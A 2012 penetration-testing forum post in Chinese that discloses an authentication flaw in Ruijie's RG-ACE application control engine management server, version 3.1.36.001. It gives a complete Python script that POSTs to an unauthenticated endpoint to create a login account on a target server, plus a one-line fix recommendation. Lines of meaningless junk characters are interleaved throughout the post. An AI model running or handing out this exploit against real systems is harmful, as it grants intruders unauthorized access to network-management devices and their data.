中国网络渗透测试联盟
标题:
锐捷应用控制引擎管理服务器可以增加用户
[打印本页]
作者:
admin
时间:
2012-12-10 10:16
标题:
锐捷应用控制引擎管理服务器可以增加用户
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接
http://www.ruijie.com.cn/service/down-search.aspx
显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)
/ `' E4 [: @! M, v6 j* V! S
9 ?* s0 ^* M; r7 t1 M
/ S6 C' I% ~: S/ H: z
测试的具体版本是
8 t& h, N7 W$ a8 x: N/ j
产品名称: 锐捷应用控制引擎
) K5 w8 z' o2 l3 \; r* \3 [+ v. v0 i
版本号: 3.1.36.001 TC
3 s, R% x% o4 ]9 o' ~
编译时间: 201104291730
" t# d* j9 E' c1 ?# T: O' T ]9 G9 w
+ o) W; ~& l- C
+ w! `- y. t+ `7 {
漏洞证明:
& z6 k4 o, B6 J" [8 ~1 @% D
2 c y6 x' E9 l6 K$ D6 x
1 \; d' {" [8 V% ?4 u. K }- g
* Z- e O8 `% c4 g8 c6 @1 r$ Q' E
9 M: z- C, Q* {
- v! E) s( a! ?3 q) ]5 ^( E
4 @( _' f# F; \2 V1 J& i
执行脚本
: O' J+ p9 `0 j9 Z; u0 e9 W
#! /usr/bin/env python
3 l" f5 u& l3 F' k
#coding=gbk
0 Y+ K% R4 o4 ~/ t9 M' W- ]% c8 s& a
#RG-ACE管理服务器 V3.1.36.001
* Q( m( { m, J, M, Y: i/ B( J
import urllib2, urllib,cookielib
; D k% T4 o' G
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
) h& b& n' |, n
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
7 W. O. S a. q& Y# o
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
, H% {/ J( ~8 y, l7 p! f; _% ]
post=(("event","userManager.doInsertUserInfo"),
/ \5 C% x& Y8 r8 V
("useractionname","addButtonValue"),
3 `0 r2 P. @8 ]% O5 O1 h
("useropermanager","userManager"),
; B* Q& D9 J7 K3 T: U
("userName","t"), #######账号自己加
+ l9 Q6 ]2 y/ D. l( e
("pwd","aaaaaa"),######密码自己加
* Z+ v5 ]; q! I9 e2 \9 Y
("trueName","ad"),
* u5 L# ^3 d1 Q9 E* ~% T) q
("email",""),
6 ^& d3 T5 L' p* B
("mobilePhone",""),
2 t1 A# d) M* g3 K5 r5 K x
("officePhone",""),
/ z5 s+ @# r& x/ `, [- g( ^
("addr",""),
& _2 A9 ^- W8 M7 k
("submit","确定"))
! a/ x, b$ L8 }9 ?0 e1 @! H
urllib2.install_opener(opener)
@9 i' A$ C- r% V! O+ J
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
- ^5 b/ Z: J! q: t4 Q6 v; C
print "Done"
! T) _. H& L) x, m4 o7 z, q& f$ N) p
+ H6 h) j, `: E$ O
登录,连接设备
. @) Y/ p+ i8 ~
3 [/ D5 x7 z5 q$ i O
+ ?: @8 ~1 A2 N. {
+ h. P" v5 k h0 ?, x! n
! _- U' W! ]# h; k! t m
9 I- i4 b$ L( M% k' C
默认的管理员admin权限更大点
" @' [- ^9 Y7 w
6 Q G& U) O3 c- f% \' t, F
7 H6 ^2 |$ a7 Z3 Z
% ^. ^- p, P9 I
- P) y W. H. C* [2 t
4 G1 L1 Y1 |8 k3 v0 m1 s
修复方案:
, g7 w+ n9 l' D9 m" P3 q: d- H
加强对接口的权限验证
P7 m0 |. m- Q/ r6 }
% U' A6 b Y4 t/ j
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2